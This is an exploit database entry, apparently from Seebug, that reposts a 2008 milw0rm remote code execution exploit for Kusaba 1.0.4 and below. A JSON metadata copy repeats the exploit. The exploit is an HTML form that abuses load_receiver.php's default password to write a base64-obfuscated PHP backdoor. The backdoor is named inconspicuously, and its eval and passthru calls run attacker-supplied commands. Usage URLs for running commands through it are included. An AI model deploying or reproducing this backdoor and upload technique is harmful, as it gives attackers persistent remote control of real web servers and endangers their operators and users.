ID SSV:65820 Type seebug Reporter Root Modified 2014-07-01T00:00:00
Description
No description provided by source.
<!--
9 Oct 2008
Kusaba <= 1.0.4 Remote Code Execution Exploit #2
Sausage <tehsausage@gmail.com>
Will work if they have left the load_receiver.php script un-edited.
After execution: (Yes these are the exact URLs)
http://www.kusaba.image.board/url/change this to the same value as your
KU_ROOTDIRpost.php?pc=print "Hello";
http://www.kusaba.image.board/url/change this to the same value as your
KU_ROOTDIRpost.php?sc=echo Hello
-->
<pre>
<form action="./load_receiver.php" method="POST">
<input type="text" name="password" value="changeme"> <!-- Don't actually
change this, unless they have changed their password and you know it -->
<input type="text" name="type" value="direct">
<input type="text" name="file"
value="PD9waHAgaXNzZXQoJF9HRVRbJ3BjJ10pPyhldmFsKHVybGRlY29kZShzdHJpcHNsYXNoZXMoJF9HRVRbJ3BjJ10pKSkpOihpc3NldCgkX0dFVFsnc2MnXSk/KHBhc3N0aHJ1KHVybGRlY29kZShzdHJpcHNsYXNoZXMoJF9HRVRbJ3NjJ10pKSkpOihoZWFkZXIoJ0xvY2F0aW9uOiAuLi8nKSkpOw==">
<!-- same backdoor from the paint_save.php exploit -->
<input type="text" name="targetname" value="post.php"> <!-- Any
inconspicuous filename will do -->
<input type="submit" value="Exploit">
</form>
# milw0rm.com [2008-10-09]
{"href": "https://www.seebug.org/vuldb/ssvid-65820", "status": "cve,poc", "bulletinFamily": "exploit", "modified": "2014-07-01T00:00:00", "title": "Kusaba <= 1.0.4 - Remote Code Execution Exploit (2)", "cvss": {"vector": "NONE", "score": 0.0}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-65820", "cvelist": [], "description": "No description provided by source.", "viewCount": 8, "published": "2014-07-01T00:00:00", "sourceData": "\n <!--\r\n9 Oct 2008\r\nKusaba <= 1.0.4 Remote Code Execution Exploit #2\r\nSausage <tehsausage@gmail.com>\r\n\r\nWill work if they have left the load_receiver.php script un-edited.\r\n\r\nAfter execution: (Yes these are the exact URLs)\r\nhttp://www.kusaba.image.board/url/change this to the same value as your\r\nKU_ROOTDIRpost.php?pc=print "Hello";\r\nhttp://www.kusaba.image.board/url/change this to the same value as your\r\nKU_ROOTDIRpost.php?sc=echo Hello\r\n-->\r\n<pre>\r\n<form action="./load_receiver.php" method="POST">\r\n<input type="text" name="password" value="changeme"> <!-- Don't actually\r\nchange this, unless they have changed their password and you know it -->\r\n<input type="text" name="type" value="direct">\r\n<input type="text" name="file"\r\nvalue="PD9waHAgaXNzZXQoJF9HRVRbJ3BjJ10pPyhldmFsKHVybGRlY29kZShzdHJpcHNsYXNoZXMoJF9HRVRbJ3BjJ10pKSkpOihpc3NldCgkX0dFVFsnc2MnXSk/KHBhc3N0aHJ1KHVybGRlY29kZShzdHJpcHNsYXNoZXMoJF9HRVRbJ3NjJ10pKSkpOihoZWFkZXIoJ0xvY2F0aW9uOiAuLi8nKSkpOw==">\r\n<!-- same backdoor from the paint_save.php exploit -->\r\n<input type="text" name="targetname" value="post.php"> <!-- Any\r\ninconspicuous filename will do -->\r\n\r\n<input type="submit" value="Exploit">\r\n</form>\r\n\r\n# milw0rm.com [2008-10-09]\r\n\n ", "id": "SSV:65820", "enchantments_done": [], "type": "seebug", "lastseen": "2017-11-19T13:44:13", "reporter": "Root", "enchantments": {"score": {"value": 0.1, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.1}, "references": [], "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645446168}}